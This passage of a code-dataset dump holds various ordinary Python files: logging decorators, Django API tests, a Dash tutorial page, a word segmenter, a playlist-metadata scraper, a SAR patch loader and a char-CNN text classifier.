result['request']['body']))\n\n logger.info(\"[%s] Response: HTTP %s\" % (_uuid, result['response']['code']))\n logger.debug(\"[%s] Response HTTP headers: %s\" % (_uuid, result['response']['headers']))\n logger.debug(\"[%s] Response message: %s\" % (_uuid, result['response']['message']))\n\n return result\n\n return wrapper\n\n\ndef log_exception(func):\n \"\"\"Decorator function to log exceptions.\"\"\"\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n logger = get_logger()\n\n result = kwargs['result']\n\n _uuid = uuid.uuid4()\n\n logger.error(\"[%s] Request: %s %s\" % (_uuid, result['request']['method'], result['request']['url']))\n logger.debug(\"[%s] Request headers: %s\" % (_uuid, result['request']['headers']))\n logger.debug(\"[%s] Request payload: %s\" % (_uuid, result['request']['body']))\n\n logger.error(\"[%s] Response: HTTP %s\" % (_uuid, result['response']['code']))\n logger.debug(\"[%s] Response headers: %s\" % (_uuid, result['response']['headers']))\n logger.debug(\"[%s] Response message: %s\" % (_uuid, result['response']['message']))\n\n func(*args, **kwargs)\n\n return wrapper\n","sub_path":"pyvdp/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"552732391","text":"import numpy as np\n\nmarkerLength = 0.012\n\nmarkerLength_tracker = 0.14 / 10 / 11 * 10\nmarkerSeparation_tracker = 0.14 / 10 / 11\n\ntracker_id_left = 45\ntracker_id_right = 40\noffset_left = -5 * 1.25\noffset_right = 5 * 1.25\n\ntracker_offset_y = 1.1 / 100\ntracker_offset_x = 7.4 / 100\n\nNULL_POINT = [np.nan, np.nan, np.nan]\n\nCOLOR_CORNER = [[0, 0, 0, 0.75]]\nCOLOR_TRACKER = [[0, 1, 0, 0.75]]\nCOLOR_CAMERA = [[0, 0, 0, 0.25]]\n","sub_path":"Aruco/Analyze/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"414019632","text":"from dexy.common import OrderedDict\nfrom dexy.doc import Doc\nfrom dexy.tests.utils import assert_output\nfrom dexy.tests.utils import wrap\n\ndef test_pyg4rst():\n o = OrderedDict()\n o['1'] = \".. code:: python\\n print 'hello'\"\n assert_output(\"pyg4rst\", \"print 'hello'\", o, ext=\".py\")\n\ndef test_html():\n with wrap() as wrapper:\n doc = Doc(\"example.py|pyg|h\",\n contents=\"print 'hello'\\n\",\n wrapper=wrapper)\n wrapper.docs = [doc]\n wrapper.run()\n\n assert \"\"\"\"\"\" in doc.output().as_text()\n\ndef test_png():\n with wrap() as wrapper:\n doc = Doc(\"example.py|pyg|pn\",\n contents=\"print 'hello'\\n\",\n wrapper=wrapper)\n wrapper.docs = [doc]\n wrapper.run()\n\ndef test_jpg():\n with wrap() as wrapper:\n doc = Doc(\"example.py|pyg|jn\",\n contents=\"print 'hello'\\n\",\n wrapper=wrapper)\n wrapper.docs = [doc]\n wrapper.run()\n\ndef test_gif():\n with wrap() as wrapper:\n doc = Doc(\"example.py|pyg|gn\",\n contents=\"print 'hello'\\n\",\n wrapper=wrapper)\n wrapper.docs = [doc]\n wrapper.run()\n","sub_path":"dexy/tests/plugins/test_pygments_filters.py","file_name":"test_pygments_filters.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"546340328","text":"# -*- coding: utf-8 -*-\n\"\"\"Test suite module for prance.\"\"\"\n\n__author__ = 'Jens Finkhaeuser'\n__copyright__ = 'Copyright (c) 2016-2018 Jens Finkhaeuser'\n__license__ = 'MIT +no-false-attribs'\n__all__ = ()\n\ndef _find_imports(*args):\n \"\"\"\n Helper sorting the named modules into existing and not existing.\n \"\"\"\n import importlib\n exists = {\n True: [],\n False: [],\n }\n\n for name in args:\n try:\n importlib.import_module(name)\n exists[True].append(name)\n except ImportError:\n exists[False].append(name)\n\n return exists\n\n\ndef none_of(*args):\n \"\"\"\n Return true if none of the named modules exist, false otheriwse.\n \"\"\"\n exists = _find_imports(*args)\n return len(exists[True]) == 0\n","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"100822705","text":"import math\nimport sys\nfrom collections import defaultdict\n\n\n#inputfile='./model_file.word'\n#outputfile='segment_file'\n\n#f=open(inputfile,'r')\n#g=open(outputfile,'w')\n\nwith open(sys.argv[1],'r') as inputfile, open(sys.argv[2], 'r') as testfile:\n\n\tprobabilities = defaultdict(int)\n\n\tfor line in inputfile:\n\t\tline = line.split('\\t')\n\t\tprobabilities[line[0]] = float(line[1])\n\n########################\n\n\tlam=0.95\n\tlam_unk=1-lam\n\tV=1000000\n\tfor line in testfile:\n\t\tline=line.strip()\n\t\t#words=line.split(\" \")\n\t\t#words-utf=unicode(words,\"utf-8\")\n\t\t#前向き\n\t\tbest_edge={}\n\t\tbest_score={}\n\t\tbest_edge[0] = 'NULL'\n\t\tbest_score[0] = 0 \n\t\tfor word_end in range(1,len(line)):\n\t\t\tbest_score[word_end]=10000000000\n\t\t\tfor word_begin in range(0,word_end):\n\t\t\t\tword=line[word_begin:word_end]\n\t\t\t\tif word in probabilities or len(word)==1:\n\t\t\t\t\tprob=lam * probabilities[word] + lam_unk / V\n\t\t\t\t\tmy_score=best_score[word_begin]-math.log(prob,2)\n\t\t\t\t\tif my_score < best_score[word_end]:\n\t\t\t\t\t\tbest_score[word_end]=my_score\n\t\t\t\t\t\tbest_edge[word_end]=(word_begin,word_end)\n\t #後向き\n\t\twords=[]\n\t\tnext_edge=best_edge[len(best_edge)-1]\n\t\twhile next_edge!='NULL':\n\t\t\tword=line[next_edge[0]:next_edge[1]]\n\t\t\tword.encode(encoding='utf-8')\n\t\t\twords.append(word)\n\t\t\tnext_edge=best_edge[next_edge[0]]\n\t\twords.reverse()\n\t\tprint(' '.join(words))\n\n\n\n\n\n","sub_path":"yuting/tutorial03/word-segment.py","file_name":"word-segment.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"48747460","text":"from bs4 import BeautifulSoup\nimport requests\nimport time\nimport json\n\n#from import playlist_url\n\ntime.sleep(1) ##For safety\n##Will need to learn how to get the url from the chrome interphase. Problem for a later day\nplaylist_url = 'https://8tracks.com/nothyme1/please-study-you-re-failing' ##Random page I pulled for testing\nresponse = requests.get(playlist_url)\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n##Need to store: The Song, The Artist -> For the actual spotify playlist\n ##Also need: The cover image, the notes, the maker of the playlist\n\ndisc = soup.find(\"meta\", {'property':'og:description'})['content'].replace('\\n','') ##Strip out breaks for use in spotify disc\nauthor = str(soup.find(\"meta\", {'property':'music:creator'})['content']).split('/')[-1]\ntitle = soup.find(\"meta\", {'property':'og:title'})['content']\ncover = soup.find(\"meta\", {'property':'og:image'})['content']\n\n##Store this info in a json\ndata = {\n 'Description': disc + \" A playlist by \" + author + \". Made using \",\n 'Title': title,\n 'Cover': cover\n}\nwith open(\"./store/meta.json\", 'w') as outfile:\n json.dump(data, outfile)\n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"139880898","text":"\n\nfrom xai.brain.wordbase.nouns._miniskirt import _MINISKIRT\n\n#calss header\nclass _MINISKIRTS(_MINISKIRT, ):\n\tdef __init__(self,): \n\t\t_MINISKIRT.__init__(self)\n\t\tself.name = \"MINISKIRTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"miniskirt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_miniskirts.py","file_name":"_miniskirts.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"348011839","text":"import dash_html_components as html\n\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nfrom textwrap import dedent\n\nfrom tutorial import tools\nfrom tutorial import styles\n\n\nexamples = {\n example: tools.load_example('tutorial/examples/table/{}'.format(example))\n for example in ['interactivity_connected_to_graph.py']\n}\n\nlayout = html.Div(\n [\n\n dcc.Markdown(\n dedent(\n \"\"\"\n # DataTable Interactivity\n\n `DataTable` includes several features for modifying and transforming the\n view of the data. These include:\n\n - Sorting by column (`sorting=True`)\n - Filtering by column (`filtering=True`)\n - Editing the cells (`editable=True`)\n - Deleting rows (`row_deletable=True`)\n - Deleting columns (`columns[i].deletable=True`)\n - Selecting rows (`row_selectable='single' | 'multi'`)\n\n A quick note on filtering. We have defined our own\n syntax for performing filtering operations. Here are some\n examples for this particular dataset:\n\n - Enter `eq \"Asia\"` in the \"continent\" column\n - Enter `> num(5000)` in the \"gdpPercap\" column\n - Enter `< num(80)` in the `lifeExp` column\n\n > Note that you need to wrap strings in double quotes (`\"`) and\n > numbers in `num`.\n > We will improve this syntax in the future,\n > follow [dash-table#169](https://github.com/plotly/dash-table/issues/169)\n > for more.\n\n \"\"\"\n )\n ),\n\n dcc.Markdown(dedent(\n \"\"\"\n By default, these transformations are done clientside.\n Your Dash callbacks can respond to these modifications\n by listening to the `data` property as an `Input`.\n\n Note that if `data` is an `Input` then the entire\n `data` will be passed over the network: if your dataframe is\n large, then this will become slow. For large dataframes, you can\n perform the [sorting or filtering in Python instead](/datatable/callbacks).\n \"\"\"\n )),\n\n dcc.SyntaxHighlighter(\n examples['interactivity_connected_to_graph.py'][0],\n language='python',\n customStyle=styles.code_container\n ),\n\n html.Div(\n examples['interactivity_connected_to_graph.py'][1],\n className='example-container'\n ),\n\n ]\n)\n","sub_path":"tutorial/table/interactivity_chapter.py","file_name":"interactivity_chapter.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"33253245","text":"#!/usr/bin/env python\nimport os, sys\nfrom setuptools import setup, find_packages\n\nif sys.argv[-1] == 'publish':\n os.system('python setup.py sdist upload')\n sys.exit(0)\n\nwith open('README.rst') as f:\n long_description = f.read()\n\n\nVERSION = __import__('dbgutils').get_version()\n\nsetup(\n name='django-dbgutils',\n version=VERSION,\n url='https://github.com/dakrauth/django-dbgutils',\n author='David A Krauth',\n author_email='dakrauth@gmail.com',\n description='Basic collection of extra debugging tools for Django.',\n long_description=long_description,\n platforms=['any'],\n license='MIT License',\n classifiers=(\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n ),\n packages=find_packages(),\n package_data={'dbgutils': ['templates/dbgutils/*']},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"158615426","text":"from django.urls import reverse\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.hashers import check_password\nfrom nose.tools import ok_, eq_\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom faker import Faker\nfrom ..models import User, UserProfile, Referral, Transaction, P2PTransfer\nfrom .factories import UserFactory\n\nfake = Faker()\n\n\nclass TestUserListTestCase(APITestCase):\n \"\"\"\n Tests /users list operations.\n \"\"\"\n\n def setUp(self):\n self.url = reverse('user-list')\n self.user_data = model_to_dict(UserFactory.build())\n\n def test_post_request_with_no_data_fails(self):\n response = self.client.post(self.url, {})\n eq_(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_post_request_with_valid_data_succeeds(self):\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_201_CREATED)\n\n user = User.objects.get(pk=response.data.get('id'))\n eq_(user.username, self.user_data.get('username'))\n ok_(check_password(self.user_data.get('password'), user.password))\n\n def test_post_request_with_valid_data_succeeds_and_profile_is_created(self):\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_201_CREATED)\n\n eq_(UserProfile.objects.filter(user__username=self.user_data['username']).exists(), True)\n\n def test_post_request_with_valid_data_succeeds_referral_is_created_if_code_is_valid(self):\n referring_user = UserFactory()\n self.user_data.update({\"referral_code\": referring_user.userprofile.referral_code})\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_201_CREATED)\n\n eq_(Referral.objects.filter(referred__username=self.user_data['username'],\n owner__username=referring_user.username).exists(), True)\n\n def test_post_request_with_valid_data_succeeds_referral_is_not_created_if_code_is_invalid(self):\n self.user_data.update({\"referral_code\": \"FAKECODE\"})\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\nclass TestUserDetailTestCase(APITestCase):\n \"\"\"\n Tests /users detail operations.\n \"\"\"\n\n def setUp(self):\n self.user = UserFactory()\n self.url = reverse('user-detail', kwargs={'pk': self.user.pk})\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.user.auth_token}')\n\n def test_get_request_returns_a_given_user(self):\n response = self.client.get(self.url)\n eq_(response.status_code, status.HTTP_200_OK)\n\n def test_put_request_updates_a_user(self):\n new_first_name = fake.first_name()\n payload = {'first_name': new_first_name}\n response = self.client.put(self.url, payload)\n eq_(response.status_code, status.HTTP_200_OK)\n\n user = User.objects.get(pk=self.user.id)\n eq_(user.first_name, new_first_name)\n\n\nclass TestTransactions(APITestCase):\n \"\"\"\n Tests /users/:user_id/deposits operations.\n Tests /users/:user_id/withdrawals operations.\n Tests /account/ operations\n \"\"\"\n\n def setUp(self):\n self.user = UserFactory()\n self.user2 = UserFactory()\n\n self.transaction = Transaction.objects.create(\n owner=self.user, reference='deposit', amount=100, status='deposited'\n )\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.user.auth_token}')\n\n def test_user_can_make_a_deposit(self):\n payload = {'amount': 10.50}\n url = reverse('transaction-deposits', kwargs={'user_id': self.user.pk})\n response = self.client.post(url, payload)\n eq_(response.status_code, status.HTTP_200_OK)\n\n transaction = Transaction.objects.latest()\n eq_(transaction.amount, payload['amount'])\n eq_(transaction.status, 'deposited')\n\n def test_user_can_make_a_withdrawal(self):\n payload = {'amount': 10.50}\n url = reverse('transaction-withdrawals', kwargs={'user_id': self.user.pk})\n response = self.client.post(url, payload)\n eq_(response.status_code, status.HTTP_200_OK)\n\n transaction = Transaction.objects.latest()\n eq_(transaction.amount, -payload['amount'])\n eq_(transaction.status, 'withdrawn')\n\n def test_user_with_empty_balance_can_make_a_withdrawal(self):\n payload = {'amount': 10.50}\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.user2.auth_token}')\n\n url = reverse('transaction-withdrawals', kwargs={'user_id': self.user2.pk})\n response = self.client.post(url, payload)\n eq_(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_user_can_make_a_p2p_transfer(self):\n payload = {'amount': 10.50}\n url = reverse(\n 'account-p2p-transfer',\n kwargs={\n 'sender_account_id': self.user.pk,\n 'recipient_account_id': self.user2.pk\n }\n )\n response = self.client.post(url, payload)\n eq_(response.status_code, status.HTTP_200_OK)\n\n user_transaction = Transaction.objects.filter(owner=self.user).latest()\n user2_transaction = Transaction.objects.filter(owner=self.user2).latest()\n\n p2p_transfer = P2PTransfer.objects.latest()\n\n eq_(user_transaction.amount, -payload['amount'])\n eq_(user2_transaction.amount, payload['amount'])\n\n ok_(p2p_transfer.sender, self.user)\n ok_(p2p_transfer.recipient, self.user2)\n\n def test_user_can_fetch_all_transactions(self):\n url = reverse('transaction-fetch-all-transactions', kwargs={'account_id': self.user.pk})\n response = self.client.get(url)\n\n eq_(response.status_code, status.HTTP_200_OK)\n ok_(response.data['results'][0]['id'], self.transaction.id)\n\n def test_user_can_fetch_a_single_transaction(self):\n url = reverse(\n 'transaction-fetch-a-single-transaction',\n kwargs={'account_id': self.user.pk, 'transaction_id': self.transaction.pk}\n )\n response = self.client.get(url)\n\n eq_(response.status_code, status.HTTP_200_OK)\n ok_(response.data['id'], self.transaction.id)\n","sub_path":"flite/users/test/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"574477496","text":"# Write a Python program to flip a coin 1000 times and count heads and tails.\nimport random\nimport itertools\nresults = {\n '頭': 0,\n '字': 0,\n}\nsides = list(results.keys())\nfor i in range(10000):\n results[random.choice(sides)] += 1 #隨機選頭或字 選好了就塞進結果DICT中\nprint('頭:', results['頭'])\nprint('字:', results['字'])\n","sub_path":"Python課程/動手學Python (Python Hand-on Solve 200 Problems)/116.翻硬幣.py","file_name":"116.翻硬幣.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"563383089","text":"import sys, collections\nsys.stdin = open(\"테이프_input.txt\")\n# 조합을 써야함.\n\ndef comb(n, r): # n 개의 수중 r개의 조합을 뽑는다.\n global my_min\n if r == 0:\n res = abs(sum(T) * 2 - sum(A))\n if my_min > res:\n my_min = res\n # print(abs(sum(T) * 2 - sum(A)))\n # print(T)\n elif n < r:\n return\n else:\n T[r-1] = A[n-1] # 빈상자에 바꿀것을 채움\n comb(n-1, r-1) # n-1, r-1\n comb(n-1, r) # n-1, r\n# T = [0] * 2 # r개의 조합을 담을 상자\n# A = [1, 2, 3] # n 개의 구슬\n# comb(3, 2)\n\nN = int(input())\nA = list(map(int, input().split()))\nT = [0] * int(N//2)\nmy_min = 99999999999999\ncomb(N, N//2)\nprint(my_min)\n\n\n\n\n","sub_path":"0331자습/테이프이어붙이기.py","file_name":"테이프이어붙이기.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"547963828","text":"import torch\nimport scipy.io\nimport numpy as np\nimport random\nfrom torch.utils.data import random_split, TensorDataset, DataLoader\nfrom tqdm import tqdm\n\ndef normalize(data):\n maxValue = np.max(data)\n minValue = np.min(data)\n data = (data - minValue) / (maxValue - minValue)\n return data\n\ndef mat_data(args):\n data_load = scipy.io.loadmat(args.data_folder + str(args.que_data_name) + '.mat')\n key = list(data_load.keys())\n # print(key)\n # input()\n # 特征导入\n stack = data_load['feature'].astype(float) # (1500,1000,3)\n print(stack.shape)\n stack = np.pad(stack, ((8,8),(8,8),(0,0)), 'edge')\n print(stack.shape)\n print(\"stack: \", stack.dtype)\n return stack\n\n\ndef reshape_rectangle_data(stack, size_1, size_2, size_3):\n h_patches = np.arange(size_3//2, stack.shape[0]-(size_3//2))\n h_size = len(h_patches)\n v_patches = np.arange(size_3//2, stack.shape[1]-(size_3//2))\n v_size = len(v_patches)\n\n stacks_1 = np.zeros((h_size * v_size, stack.shape[2], size_1 , size_1))\n stacks_2 = np.zeros((h_size * v_size, stack.shape[2], size_2 , size_2))\n stacks_3 = np.zeros((h_size * v_size, stack.shape[2], size_3 , size_3))\n\n i = 0\n for h in tqdm(h_patches):\n for v in v_patches:\n for layer in range (stack.shape[2]):\n stacks_1[i][layer] = stack[(h-size_1//2):(h+size_1//2+1), (v-size_1//2):(v+size_1//2+1), layer]\n stacks_2[i][layer] = stack[(h-size_2//2):(h+size_2//2+1), (v-size_2//2):(v+size_2//2+1), layer]\n stacks_3[i][layer] = stack[(h-size_3//2):(h+size_3//2+1), (v-size_3//2):(v+size_3//2+1), layer]\n i += 1\n '''\n print(f\"stacks_1: {stacks_1.shape}\") # (739872,27,5,5)\n print(f\"stacks_2: {stacks_2.shape}\") # (739872,27,11,11)\n print(f\"stacks_3: {stacks_3.shape}\") # (739872,27,17,17)\n print(f\"gts: {gts.shape}\") # (750360)\n '''\n return stacks_1, stacks_2, stacks_3\n\ndef sar_datesets(args):\n stack= mat_data(args)\n stack = normalize(stack) # 特征归一化\n stacks_1, stacks_2, stacks_3 = reshape_rectangle_data(stack, args.sar_size1, args.sar_size2, args.sar_size3)\n print(f\"Resizing image of size {stack.shape} to image patches {stacks_1.shape}, {stacks_2.shape} and {stacks_3.shape}\")\n input(\"save:\")\n np.save('./data/' + args.que_data_name + '/stacks_1.npy', stacks_1)\n np.save('./data/' + args.que_data_name + '/stacks_2.npy', stacks_2)\n np.save('./data/' + args.que_data_name + '/stacks_3.npy', stacks_3)\n \n return 1\n\ndef sar_dataloader(args, gts_class, gts, stacks_1, stacks_2, stacks_3, split='train', form='support', shuffle=True):\n # init parameters\n if split == 'train':\n if form == 'support':\n n_shot = args.train_n_shot\n elif form == 'query':\n n_shot = args.train_n_query\n else:\n print(\"form error\")\n elif split == 'test':\n if form == 'support':\n n_shot = args.test_n_shot\n elif form == 'query':\n n_shot = args.test_n_query\n else:\n print(\"form error\")\n else:\n print(\"split error\")\n stack_index = np.arange(0, gts.size(0)) # 生成stack的索引\n index = np.zeros((1, 2), dtype=int) # 生成一个零数组,方便for循环\n class_num = np.zeros(args.test_n_way).astype(int)\n j = 0\n for i in gts_class:\n stack_index_i = stack_index[gts == i]\n gts_index_i = np.ones(n_shot, dtype=int)*j\n gts_index_i = gts_index_i[:, np.newaxis] # 增加维度\n class_num[i] = len(stack_index_i)\n # print(i, \":\", len(stack_index_i))\n stack_index_i = np.random.choice(stack_index_i, n_shot, False)\n # print(\"stack_index_i: \", stack_index_i)\n stack_index_i = stack_index_i[:, np.newaxis]\n index_i = np.concatenate((stack_index_i, gts_index_i), axis=1)\n index = np.concatenate((index, index_i), axis=0)\n j += 1\n \n if shuffle :\n index = np.random.permutation(np.delete(index, 0 , 0)) # 去除第一个值并打乱顺序\n else:\n index = np.delete(index, 0 , 0) # 不打乱顺序\n # print(\"index: \", index)\n # print(\"gts: \", gts[133829], gts[181901], gts[21650], gts[51858])\n epoch_stacks_1 = []\n epoch_stacks_2 = []\n epoch_stacks_3 = []\n epoch_gts = torch.from_numpy(index[:,1])\n for item in list(index[:,0]):\n epoch_stacks_1.append(stacks_1[item].unsqueeze(0)) # 每一行需要增加一维,拼接时保证维度正确\n epoch_stacks_2.append(stacks_2[item].unsqueeze(0))\n epoch_stacks_3.append(stacks_3[item].unsqueeze(0))\n epoch_stacks_1 = torch.cat(epoch_stacks_1, dim=0) # (25,27,5,5)\n epoch_stacks_2 = torch.cat(epoch_stacks_2, dim=0)\n epoch_stacks_3 = torch.cat(epoch_stacks_3, dim=0)\n return epoch_stacks_1, epoch_stacks_2, epoch_stacks_3, epoch_gts, class_num\n","sub_path":"optical/all_sar_data.py","file_name":"all_sar_data.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"385596905","text":"#!/usr/bin/python\nfrom transaction.base_task import *\nfrom service.message_define import *\nfrom test_result_enum import *\n\nclass ModifyDeviceTask(BaseTask):\n operate_timeout = 20\n def __init__(self, task_type, messsage_handler,\n case_manager,logger_name):\n self.case_manager = case_manager\n #logger_name = \"task.modify_device\"\n BaseTask.__init__(self, task_type, RequestDefine.modify_device,\n messsage_handler, logger_name)\n \n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.modify_device, result_success,\n self.onModifySuccess)\n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.modify_device, result_fail,\n self.onModifyFail)\n self.addTransferRule(state_initial, AppMessage.EVENT,\n EventDefine.timeout, result_any,\n self.onModifyTimeout) \n \n\n def invokeSession(self, session):\n \"\"\"\n task start, must override\n \"\"\"\n request = getRequest(RequestDefine.modify_device)\n param = self.case_manager.getParam()\n control_server = param[\"control_server\"] \n \n ##build from image\n device_name = param[\"device_name\"]\n uuid = param[\"device\"]\n disk_type = int(param[\"disk_type\"])\n authen_user = param[\"authen_user\"]\n authen_pwd = param[\"authen_pwd\"]\n ss_uuid = param[\"ss_uuid\"] \n authen = param[\"authen\"]\n crypt_trans = param[\"crypt_trans\"]\n cmp_trans = param[\"cmp_trans\"]\n\n option = []\n if authen:\n option.append(1)\n else:\n option.append(0)\n\n if crypt_trans:\n option.append(1)\n else:\n option.append(0)\n\n if cmp_trans:\n option.append(1)\n else:\n option.append(0) \n \n request.setString(ParamKeyDefine.name,device_name)\n request.setString(ParamKeyDefine.uuid, uuid)\n request.setUIntArray(ParamKeyDefine.option, option)\n request.setUInt(ParamKeyDefine.disk_type, disk_type)\n request.setString(ParamKeyDefine.user, authen_user)\n request.setString(ParamKeyDefine.authentication, authen_pwd)\n request.setString(ParamKeyDefine.snapshot,ss_uuid)\n \n self.info(\"[%08X]request modify device '%s' to control server '%s'\"%\n (session.session_id, device_name, control_server))\n session.target = device_name\n request.session = session.session_id\n self.setTimer(session, self.operate_timeout)\n self.sendMessage(request, control_server)\n\n def onModifySuccess(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]modify host success\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.success) \n session.finish()\n\n def onModifyFail(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]modify device fail\"%\n (session.session_id))\n \n self.case_manager.finishTestCase(TestResultEnum.fail)\n session.finish()\n \n def onModifyTimeout(self, msg, session):\n self.info(\"[%08X]modify device timeout\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.timeout)\n session.finish()\n\n","sub_path":"zctool_v1.25_共享存储/task/modify_device.py","file_name":"modify_device.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"359409524","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAn implementation of\n\n Character-level Convolutional Networks for Text Classification\n Zhang and LeCun, 2015 (See https://arxiv.org/abs/1509.01626)\n\n\"\"\"\n\nimport numpy as np\nimport json\n\nimport tensorflow as tf\n\nfrom charcnn import data\n\n\ndef char_cnn(features, n_vocab, n_classes, with_dropout=True):\n \"\"\"\n Char-CNN, see Zhang and LeCun, 2015.\n \"\"\"\n\n # reserve for special control characters – eg unknown, padding\n n_vocab = n_vocab + data.N_VOCAB_RESERVED\n\n if with_dropout:\n dropout_probability = 0.5\n else:\n dropout_probability = 0.0\n\n def conv(inputs, filters, kernel_size):\n activation_layer = tf.layers.Conv1D(filters=filters,\n kernel_size=kernel_size,\n padding='same',\n activation=tf.nn.relu,\n dtype=inputs.dtype.base_dtype)\n\n activation = activation_layer(inputs)\n\n tf.summary.histogram('activations', activation)\n tf.summary.histogram('kernel', activation_layer.kernel)\n tf.summary.histogram('bias', activation_layer.bias)\n\n tf.summary.scalar('activation_non_zeros', tf.count_nonzero(activation_layer.bias))\n tf.summary.scalar('kernel_non_zeros', tf.count_nonzero(activation_layer.bias))\n tf.summary.scalar('bias_non_zeros', tf.count_nonzero(activation_layer.bias))\n\n return activation\n\n def pool(activation, pool_size):\n mp = tf.layers.max_pooling1d(inputs=activation,\n pool_size=pool_size,\n strides=pool_size)\n\n return mp\n\n def dense(features, units, with_dropout=True):\n d = tf.layers.dense(inputs=features, units=units)\n if with_dropout:\n d = tf.layers.dropout(d, dropout_probability)\n\n return d\n\n # char-cnn\n #\n with tf.name_scope('block-1'):\n c1 = conv(features['chars'], filters=256, kernel_size=7)\n c1 = pool(c1, pool_size=3)\n\n with tf.name_scope('block-2'):\n c2 = conv(c1, filters=256, kernel_size=7)\n c2 = pool(c2, pool_size=3)\n\n with tf.name_scope('block-3'):\n c3 = conv(c2, filters=256, kernel_size=3)\n c4 = conv(c3, filters=256, kernel_size=3)\n c5 = conv(c4, filters=256, kernel_size=3)\n c6 = conv(c5, filters=256, kernel_size=3)\n c6 = pool(c6, pool_size=3)\n\n with tf.name_scope('dense'):\n f1 = tf.layers.flatten(inputs=c6)\n d1 = dense(f1, units=1024)\n d2 = dense(d1, units=1024)\n logits = dense(d2, units=n_classes, with_dropout=False)\n\n return logits\n\n\ndef model_fn(features, labels, mode, params):\n \"\"\"\n Estimator model function for prediction, training and evaluation.\n \"\"\"\n\n def probability_ops(logits):\n probabilities = tf.nn.softmax(logits, name='classes')\n return probabilities, tf.argmax(probabilities, axis=1)\n\n def loss_op(labels, logits):\n return tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)\n\n # prediction\n logits = char_cnn(features, len(params['vocab']), len(params['classes']))\n\n # predict\n if mode == tf.estimator.ModeKeys.PREDICT:\n probabilities, predicted_indices = probability_ops(logits)\n\n predictions = {\n 'prediction_index': predicted_indices,\n 'prediction': tf.gather(params['classes'], predicted_indices),\n 'probabilities': probabilities\n }\n\n # add ground truth to the output if it's there\n if 'ground_truth' in features:\n predictions['ground_truth'] = features['ground_truth']\n\n return tf.estimator.EstimatorSpec(\n mode,\n predictions=predictions,\n export_outputs={\n 'predictions': tf.estimator.export.PredictOutput(predictions)\n })\n\n # train\n if mode == tf.estimator.ModeKeys.TRAIN:\n global_step = tf.train.get_or_create_global_step()\n loss = loss_op(labels, logits)\n optimizer = tf.train.AdamOptimizer()\n\n # get hold of the gradients in order to summarize them\n gradients = optimizer.compute_gradients(loss)\n train_op = optimizer.apply_gradients(gradients, global_step=global_step)\n\n # metrics\n tf.summary.scalar('cross_entropy', loss)\n\n for pair in gradients:\n gradient, variable = pair\n summary_name = ('%s_gradient' % variable.name).replace(':', '_')\n tf.summary.histogram(summary_name, gradient)\n\n return tf.estimator.EstimatorSpec(\n mode,\n loss=loss,\n train_op=train_op)\n\n # evaluate\n if mode == tf.estimator.ModeKeys.EVAL:\n probabilities, predicted_indices = 